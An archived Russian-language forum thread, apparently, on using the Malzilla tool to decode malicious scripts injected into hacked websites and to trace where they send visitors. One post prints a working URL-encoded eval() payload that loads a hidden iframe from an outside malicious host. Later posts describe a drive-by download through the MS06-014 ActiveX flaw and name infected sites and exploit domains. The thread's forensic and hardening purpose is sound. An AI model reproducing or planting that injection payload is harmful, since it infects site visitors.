Перейти к содержанию

Куда течет траффик, смотрит вЪебмастир


Рекомендуемые сообщения

Часто бывает, что Вы "неожиданно, как первый снег" попадаете на страничку с эксплоитами встроенными в нее. Ну одно дело, если это сайт какойто, на который Вы забрели в процессе серфинга. Совсем другое дело, если это Ваш сайт. Попытки заразить клиентов, которые приходят на Ваш сайт, это гораздо хуже, чем встроенный "вор траффика". Как же посмотреть, что это? Куда идут данные. Очень простая в этом плане (ну не для любителей к сожалению, хотя попробовать можно) софтина живет на http://malzilla.sourceforge.net. Постоянно обновляется, знает например уже про свежий Mpack и E-pay. Попробовать можно например тут hччp://alftrans.ru/, ну или на бесплатном порносайте :о)) На вкладке Download в поле URL вбиваете адрес, и смотрите код странички. Дальше начинаються веселые игры, берете разработчика (вебмастера) своего сайта за ... эээ, первичные половые признаки, тыкаете его носом в сие, далее исходя из фантазии :о))

Ссылка на комментарий
Поделиться на другие сайты

Ну так скыть практическая часть, началась. Позвонил мне один уважаемый человек с форума, надо говорит глянуть быстро сайт, помочь людям.

Ну глянул. Работает как часы, очень быстро все. Сижу на работе же, спецсредств нету :о)) Беру малзилу. Запуская, пихаю строчку с адресом ей и смотрю. Упс!

1)<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%77%69%6e%68%65%78%2e%6f%72%67%2f%6e%65%77%73%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%30%31%36%29%2b%27%39%30%5c%27%20%77%69%64%74%68%3d%34%39%20%68%65%69%67%68%74%3d%31%38%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><iframe src="http://xstuff.biz/tdsko-xyz/index.php?out=1194902021" Ктото ифреймом развлекается. Спросим у яндыкса может кто?

http://www.yandex.ru/yandsearch?text=xstuff.biz&rpt=rad и пошли ссылки

http://www.weblancer.net/forum/themes/3751...amp;avatars=off человек уже боролся с iframe

http://www.troitsk.ru/phpBB/viewtopic.php?...1801ddcde43038c тут некто ranger спасает сайт мэра Троицка, от этого же самого. Ну и так далее, и тому подобное.

Могу сказать единственное :о)) Сайт надо чистить, скоро антивирусы будут ругаться у клиентов на этот скрипт как на js\троянца. Проблемы судя по конфигурации Программного обеспечения у хостера, дырка больно старая.

Ссылка на комментарий
Поделиться на другие сайты

:smile20: Очень хорошая программа.

Собственно найти сайты для анализа можно с помощью запроса в Яндексе "+(document.write|eval) +unescape".

Дело в том, что для вставки в просматриваемую HTML-страницу вредоносных вставок (как правило, это IFRAME) используется динамическая модификация HTML-страницы либо с помощью процедуры Javascript document.write, либо с помощью eval (что и продемонстировано в примере уважаемого Loo).

 

Возьмем, например www.enterstudio.ru

 

1)Переходим на закладку Download, вводим в поле URL эту ссылку, выбираем браузер, под который мы будем маскироваться - лучше выбирать IE (в строке есть MS IE 6.0), и делаем включенной галочку вUse User Agent ( иначе нас раскусят) и нажимаем Get.

2) В верхней части окна видим текст загруженной страницы. Что это за странные длинные строки вверху без единого русского слова внутри тега script? Это и есть вредоносный скрипт на языке JavaScript. Нам нужно понять, что же он делает, так как он замаскирован (obfuscated). Для этого нажимаем кнопку "Send script to decoder". Собственно скрипт подсвечивается для наглядности.

3) Переходим на закладку Decode и видим в верхней части окна текст, который был внутри тега script. Нажимаем кнопку "Run script", чем запускаем процесс его выполнения в специальной ограниченной (и безопасной) среде Javascript. Результат его работы - то, что было бы добавлено после его выполнения в браузере к HTML-странице (и обработано потом браузером). Это другой скрипт (выскакивает сообщение об этом) .

4)Смотрим текст в нижней части окна и убеждаемся, что он также абсолютно нечитабелен. Значит, надо запускать и его для его раскодирования. С помощью Copy-paste копируем текст из нижней части в верхнюю часть окна (а старый текст в ней удаляем), за исключением собственно тегов script (иначе при попытке выполнения появится сообщение о том, что скрипт нельзя выполнить - такая вот ограниченная среда выполнения, что никаких тегов не должно быть - только чистый Javascript) . После и снова жмем на кнопку "Run script".

5)Получается уже что-то более-менее читабельное. Для удобства чтения можно нажать кнопку "Format text". Дальнейшие попытки повторения шага 4 ни к чему не приведут, так как скрипт наконец раскодирован и в нем активно используется работами с DOM-объектами для динамической модификации HTML-страницы (чего эта ограниченная среда не понимает).

6) Обратите внимание на команду "document.createElement('iframe')" - создается новый IFRAME. Командой "rq.setAttribute ('src', JP);" задается источник данных для него (URL хакерской старницы с эксплойтами), а командой "document.body.appendChild ( rq);" этот скрытый фрейм добавляется к HTML-странице.

7)Алгоритм формирования URL для фрейма достаточно сложен - вызывается какой-то хост в домене update1.classictel.org (видно, что DNS-сервер этой зоны принадлежит хакерам).

 

 

Мораль - хорошо бы посмотреть в логах корпоративного прокси - нет ли там обращений к домену update1.classictel.org :smile14:

Ссылка на комментарий
Поделиться на другие сайты

Следующий пример - _ttp://www.hrapu.net

Если в сохраненной в Яндексе копии видно, что там были подобные скрипты (проанализировать их можно, сохранив в локальный файл эту копию и вручную скопировав текст скрипта в закладку Decode), то сейчас там их нет, но зато есть прямая ссылка на IFRAME.

 

1) Поэтому выполняем шаг 1 из первого примера, а затем переходим на закладку "Link Parser", в которой выбираем закладку iFrames - и видим текст "_ttp://116.0.103.105/reflinks/". Фрейм скрытый, так как его ширина и высота равну нулю (width='0' height='0') :smile13:

2) Вводим этот новый URL в закладке Download и получаем в верхней части окна страницу со скриптом, который явно тоже закодирован. Единственная функция скрипта выполняется автоматически при загрузке страницы (из-за тега <body onload='ZLFZz()'>).

3) Но использование Decode не поможет :smile1: , так как здесь применяется другой способ - в функции все текстовые строки разбиты на части по два-три символа и вместо пробела используется специальная константа (var efds='';) - например "o"+efds+"b"+efds+"ject" превратится в "object". Надо ее заменить, чтобы скрипт стал читабельным. Для автоматизации замены можно воспользоваться закладкой "Misc Decoders", скопировав туда текст скрипта.

Используем функцию замены строки во всем тексте ("+efds+" на пустую строку)

4)Визуальный анализ показывает, что с помощью уязвимого ActiveX (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 - уязвимость MS06-014 (_ttp://www.kb.cert.org/vuls/id/234812), поэтому этот скрипт не будет работать на пропатченных компьютерах :smile3: ) скрипт будет загружать из _ttp://116.0.103.105/reflinks/exe.php" (это элемент "<DIV id='sR28nH' style='display:none'>_ttp://116.0.103.105/reflinks/exe.php</DIV>" , указанный вне скрипта, на который идет ссылка по его идентификатору sR28nH в самом скрипте - document.getElementById("sR28nH").innerText) в файл "c:\\S87ekhV.exe" и выполнять его.

 

 

Ссылка на комментарий
Поделиться на другие сайты

Еще один пример - с использованием функции eval (см. _ttp://www.r-t-f-m.info/_books/12001/functions.htm) - www.an24.ru (найден все тем же поисковым запросом :smile14: )

 

1) После загрузки видно, что на странице несколько закодированных скриптов - ручной работы не избежать, но оказывается при последовательных нажатиях на "Send script to decoder" последовательно выбираются все скрипты на странице. В данном случае все скрипты оказались одинаковыми :smile1:

2) После декодирования первого скрипта оказывается, что он генерирует создание iframe (опять же с нулевой длиной и шириной). Источник (хакерский сайт) уже не работает :smile5:

 

 

 

Ссылка на комментарий
Поделиться на другие сайты

Если я чересчур углубился в дебри :smile7: - скажите. Постараюсь объяснить, что не понятно. :smile19:

Я не понял некоторые вещи.

Сначала о том, как я понял вышеприведеннвые данные (за что большое спасибо и Вам, и Loo). Я понял, что если мы будем периодически проверять свой сайт, то он не вылетит из поиска за распространение троянов, на нас не будут ругаться посетители за то, что у них ругаются антивирусы и напротив нашего сайта в Гугле не появится надпись "Этот сайт может причинить вред вашему компьютеру". Это так?

 

Теперь о том, что я не понял.

 

1. В первом примере я так и не нашел "document.createElement('iframe')" Искал глазами, потом скопировал текст в Ворд и поискал по ctrl+F. И все равно не нашел.Искал во результатах второго декодинга - там где вместо длинных строк нечто более-менее осмысленное.

 

2. Я понял для себя так, что прикладное применение этой программы для непрофессионалов - понять, есть ли вообще скрипт на сайте (нашем или дружественном) и попытаться понять, куда идет трафик.

 

Тут есть три непонятных мне момента:

- в первом примере я так и не понял, куда он идет

 

- а что нам даст знание того, куда трафик отправлялся? Что делать потом с этой инфрмацией и xxtv действия будт отличаться от того, что мы ее не знаем?

 

- что с этим делать? То есть, понятно, что удалять вредный код надо, а кого искать для этого? Или просто руками все скрипты, которые программа подсветила, удалить? На практике я один раз с такой бедой сталкивался, там код нашли по iframe с помощью ctrl+f, после чего владелец нашел программера, который написал скрипт, удаляющий безобразие из кода на все страницах. Есть ли еще варианты реагирования?

 

Ну, вот, собственно. :smile13:

Ссылка на комментарий
Поделиться на другие сайты

Я не понял некоторые вещи.

Сначала о том, как я понял вышеприведеннвые данные (за что большое спасибо и Вам, и Loo). Я понял, что если мы будем периодически проверять свой сайт, то он не вылетит из поиска за распространение троянов, на нас не будут ругаться посетители за то, что у них ругаются антивирусы и напротив нашего сайта в Гугле не появится надпись "Этот сайт может причинить вред вашему компьютеру". Это так?

Ну как сказать - это чисто реактивная защита ("гром не грянет...") :smile3: Это похоже на то, что мы отключили постоянную антивирусную проверку и лишь периодически запускаем антивирус. При таком подходе проблем не оберешься :smile17: поэтому такая периодическая проверка полезна, но не является главным средством для защиты веб-сайтов. Этому вопросу (безопасности веб-серверов) посвящено много книг.

 

Я - сторонник проактивного подхода, поэтому рекомендовал бы лучше повысить безопасность веб-сайта путем специальных настроек. Есть ряд методических документов по безопасности веб-серверов (best practices), которые полезно посмотреть на сайтах www.cisecurity.org и iase.disa.mil.

Из последних книг можно почитать _ttp://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/0470170778/ref=sr_1_1?ie=UTF8&s=books&qid=1196179269&sr=8-1

 

Теперь о том, что я не понял.

 

1. В первом примере я так и не нашел "document.createElement('iframe')" Искал глазами, потом скопировал текст в Ворд и поискал по ctrl+F. И все равно не нашел.Искал во результатах второго декодинга - там где вместо длинных строк нечто более-менее осмысленное.

Он там есть - смотрите после второго декодинга в _нижней_ части окна Decode переход с третьей строки на четвертую.

 

2. Я понял для себя так, что прикладное применение этой программы для непрофессионалов - понять, есть ли вообще скрипт на сайте (нашем или дружественном) и попытаться понять, куда идет трафик.

 

Тут есть три непонятных мне момента:

- в первом примере я так и не понял, куда он идет

 

- а что нам даст знание того, куда трафик отправлялся? Что делать потом с этой инфрмацией и xxtv действия будт отличаться от того, что мы ее не знаем?

 

- что с этим делать? То есть, понятно, что удалять вредный код надо, а кого искать для этого? Или просто руками все скрипты, которые программа подсветила, удалить? На практике я один раз с такой бедой сталкивался, там код нашли по iframe с помощью ctrl+f, после чего владелец нашел программера, который написал скрипт, удаляющий безобразие из кода на все страницах. Есть ли еще варианты реагирования?

 

Ну, вот, собственно. :smile13:

Вообщем-то да - это так называемый forensic toolkit (средство расследования инцидентов).

В первом примере он идет куда-то примерно сюда (адрес взят из другого инцидента - classictel зажигает :smile17: )

http://216.239.59.104.XXXXXXXXXXXXXXX.upda...sictel.org/html

А там особой роли имя не играет - это редирект на примерно такой сайт - XXXXXXXXXXXXXXXX.cnc-inc.cn

Ну, а там эксплойтов :smile17:

 

Кому нужна эта информация - ну, наверное, управлению "К" :smile14: или службе безопасности компании, чтобы постараться самим прибить хакерские сайты. Но главное - это конечно удалить этот код со всех страниц сайта, как абсолютно правильно написал уважаемый Loo. Лучше всего действительно написать скрипт для этого. Но еще важнее - понять, откуда этот скрипт взялся. То ли украли пароль от FTP на рабочем компьютере администратора сайта, то ли взломали сайт через уязвимые веб-приложения (каждый день в secunia.com сообщения об уязвимостях в веб-приложениях) или ошибку конфигурации, то ли взломали другой сайт на общем хостинге и через него добавили скрипты и на другие сайты.

 

Лучше всего - предотвратить беду. Как я писал выше - нужно заранее "закрутить гайки" и перед тем, как ставить новое веб-приложение, проверить его защищенность. Но это большая сложная тема - см. www.owasp.org. Там есть большое руководство и различные методики.

:smile5: Кроме того, можно, если веб-сервер Apache,поставить на него mod-security - встроенную систему распознавания атак. очень хорошо работает (особенно с core rules), как показывает практика.

 

 

Ссылка на комментарий
Поделиться на другие сайты

Заархивировано

Эта тема находится в архиве и закрыта для дальнейших ответов.

×
×
  • Создать...